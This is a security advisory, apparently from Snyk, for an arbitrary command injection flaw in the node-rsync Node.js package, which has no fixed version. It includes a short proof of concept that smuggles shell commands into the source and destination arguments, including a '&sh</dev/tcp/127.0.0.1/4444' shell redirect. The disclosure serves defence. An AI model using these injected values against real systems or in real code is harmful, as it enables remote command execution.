Arbitrary Command Injection Affecting node-rsync package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-NODERSYNC-568773
- published 21 Jun 2020
- disclosed 7 May 2020
- credit Mik317
How to fix?
There is no fixed version for node-rsync
.
Overview
node-rsync is a Rsync wrapper for Node.js
Affected versions of this package are vulnerable to Arbitrary Command Injection. The issue occurs because user input is formatted inside a command that will be executed without any checks.
PoC By Snyk Security Team
// Build the command
var rsync = new Rsync()
.shell('ssh')
.flags('az')
.source(';/path/to/source')
.destination('&sh</dev/tcp/127.0.0.1/4444');
// Execute the command
rsync.execute(function (error, code, cmd) {
console.log(cmd)
});
References
CVSS Scores
version 3.1